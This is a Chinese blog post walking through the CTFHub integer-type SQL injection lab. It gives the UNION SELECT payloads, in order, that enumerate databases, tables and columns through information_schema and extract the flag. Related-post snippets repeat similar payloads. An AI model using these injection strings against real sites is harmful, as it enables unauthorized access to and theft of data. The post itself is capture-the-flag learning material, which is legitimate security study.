【ctfhub】sql整数型注入

最新推荐文章于 2024-03-29 16:48:00 发布
最新推荐文章于 2024-03-29 16:48:00 发布
阅读量264 收藏 2
点赞数
文章标签: sql oracle 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hyhyxyx/article/details/131927186
版权

整数型注入

在这里插入图片描述

(一)判断是否有注入漏洞:

在1后加一个’ 无回显
输入id=1 and 1=1 出现回显
将1=1变为1=2—》语句正确但是无法访问数据库(图三)
【可判定此处有整数注入漏洞】

在这里插入图片描述

(二)判断字段数量:

输入id=1 order by 2 看字段数量是否是两个
没有报错,证明字段的个数为2
【用order by来判断字段的个数,可以从10开始,利用二分法,一直试到2】

在这里插入图片描述

(三)查找需要的数据的位置:

通过union,即输入

/?id=-1 union select 1,2

在这里插入图片描述

可以发现需要的数据在2的位置

(四)查找数据库名

查找当前数据库名:

/?id=-1 union select 1,database()

在这里插入图片描述

查找所有数据库名:

?id=-1 union select 1,group_concat(schema_name)from information_schema.schemata

在这里插入图片描述

(五)获取数据库的表名

获取当前数据库所有的表名

/?id=-1 union select 1,group_concat(table_name) from information_schema.table where table_schema='sqli'

在这里插入图片描述

得出flag中的所有字段

/?id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='flag'

在这里插入图片描述

获取flag中的所有数据

/?id=-1 union select 1,group_concat(flag) from sqli.flag

在这里插入图片描述
得到答案

hyhyxyx
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL 整数形注入
MZa1213123的博客
03-02 2649
CTFHub SQL 整数型注入 先 and 1=1 有回显 接着 and 1=2 无回显也就错误页面 判断有 SQL 注入 order by x 爆出几个字段 order by 3 无回显 证明只有两个字段 union 联合查询 常用函数 user() database() session_usr() @@version @@basedir @@datadir @@version_compile_os 得到数据库名后 接着继续爆出该数据库的表名(奇怪.
SQL字符型注入漏洞.pdf
07-18
配套博客:https://blog.csdn.net/qq_41739364/article/details/94025729
CTFHUB——整数型SQL注入
陈艺秋的博客
01-14 1238
整型SQL注入
SQL注入整数型注入
noob_3000的博客
08-07 2873
CTFHUB整数型SQL注入
sql注入-数字型注入步骤
qq_73661602的博客
06-21 795
select * from table where id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema = '数据库名' and table_name='表名';(如果说屏幕上有两个显示位置,那我们就给两个参数1,2。因为数据库返回的字段不一定都会显示在前端中,因此我们需要找出显示的通道;确认通道后,我们按照按顺序分别找出数据库,表,列;
CTFHUB - SQL注入-整数型和字符型注入
m0_64180167的博客
11-28 2252
对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的。,在管理员不知情的情况下实现非法操作,以此来实现欺骗。执行非授权的任意查询,从而进一步得到相应的数据信息。在学习SQL注入时要了解一些MYSQL语法。
常规SQL注入(整型注入
hxhabcd123的博客
08-29 1496
常规SQL注入(整型注入
sql注入攻击流量情况
07-18
sql注入攻击流量情况
mysql&&sql注入+ctf+web安全
10-08
mysql&&sql注入+ctf+web安全
sql注入 pikachu post数字型注入
08-12
SQL 注入 Pikachu Post 数字型注入 SQL 注入是一种常见的 Web 应用安全漏洞,攻击者可以通过在输入字段中注入恶意的 SQL 语句来获取或修改敏感数据。在本文中,我们将探讨一种新的 Post 数字型注入方法,即使用 ...
sql注入之数字型注入
08-02
SQL 注入之数字型注入 SQL 注入之数字型注入是一种常见的 Web 应用安全漏洞,攻击者可以通过构造恶意输入来inject恶意 SQL 语句,访问或修改数据库中的敏感信息。本文将详细介绍数字型注入的概念、原理、检测方法和...
SQL注入原理-数值型注入
T1ngSh0w的博客
09-12 1517
SQL注入原理-数值型注入
CTFHub | 整数型注入
尼泊罗河伯的博客
10-25 2440
根据题目描述输入 1 进行测试,发现此题可能存在 SQL 注入漏洞。那么使用' and 1 = 1 ‘和' and 1 = 2’进行判断,此题存在 SQL 整数型漏洞注入。那么第一步先判断字段数量,然后检查数据库位置,知道数据库位置后查看数据库版本和数据库名。接着查看一下全部数据库名,并查看这些数据库的表名,发现一个表名为 flag 比较可疑。查看这个表名的全部字段后接着查看表中的数据得到此题 flag 。
sql注入
Gagatj_的博客
04-26 233
substr(str,pos,len) //将str从下标为pos的位置开始截取len长度的字符。table_schema:mysql中information_schema.tables表的一个列,存储着数据库中所有表所属的数据库名称。,‘单引号让字符型查询语句闭合,#将后面的语句注释掉,若为字符型查询语句应有回显,此处没有,判断为整数型注入。information_schema:存储着mysql中所以数据库,表,列,索引等的元数据信息。表示分别返回flag字符串中左边的16个字符串和右边的字符串。
理论篇8:SQL注入(字符型注入和数字型注入)
aiojay的博客
05-02 2924
SQL注入(字符型注入和数字型注入),Mysql中 int(3) 类型的含义,判断MYSQL注入闭合方式:
sql注入(整型、字符型、报错)
Xiiaogu的博客
11-10 398
1.从1开始输入数字判断字段数,输入3时报错,说明只有两个字段。2.将1改为-1,输入-1 union select 1,2 ,观察到Data发生变化,因此显示位是Data。3.接着查询数据库名,输入-1 union select 1,group_concat(schema_name) from information_schema.schemata查出数据库名为sqli。4.接着查询数据库表名,输入。
CTFHub整数型注入
sGanYu
07-24 2194
目录 SQL注入的前提 手动注入 sqlmap注入 SQL注入的前提 判断是否具备注入条件 可控参数如id=1,能否影响页面的显示结果 输入SQL语句的时候,是否报错,能否通过报错,看到数据库回显的一些语句痕迹 尝试使输入的语句不报错,使得成功闭合语句 判断是什么类型的注入 语句能否被修改 是否能够成功执行 手动注入 首先判断是否存在注入,输入1回显,输入2回显,输入3,无回显 根据回显内容判断为整数型 开始爆字段id=1 order by 1,当id =1.
sql注入整数型注入
最新发布
2401_82760239的博客
03-29 906
SQL注入是一种非常常见的数据库攻击手段,SQL注入漏洞也是网络世界中最普遍的漏洞之一。SQL注入其实就是恶意用户通过在表单中填写包含SQL关键字的数据来使数据库执行非常规代码的过程。简单来说,就是数据「越俎代庖」做了代码才能干的事情。这个问题的来源是,SQL数据库的操作是通过SQL语句来执行的,而无论是执行代码还是数据项都必须写在SQL语句之中,这就导致如果我们在数据项中加入了某些SQL语句关键字(比如说SELECT、DROP等等),这些关键字就很可能在数据库写入或读取数据时得到执行。
CTFHUB-SQL注入-整数型注入(一)
sev1n的博客
03-01 2192
后端SQL查询语句拼接了前端传递的参数,前端输入恶意的字符,打断了原有sql语句,实现了恶意的查询结果学的不够深入,理解的不够透彻,还是看了一些题解还是需要多练多学多看1.知识点整数型注入(1)检查是否存在注入and 1=1 返回正确and 1=2 返回错误(2)猜字段数order by x(x为数字)得出字段数(3)爆数据库名?得到数据库名称sqli(4)爆表名?得到表名 news,flag(5)爆列名?得到字段名flag(6)爆字段内容(flag)?
ctfhub sql注入
10-09
CTFHub是一个CTF(Capture The Flag)竞赛平台,其中包含了各种类型的安全挑战,包括SQL注入SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以利用它来绕过应用程序的身份验证、访问未授权的数据或执行恶意操作...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值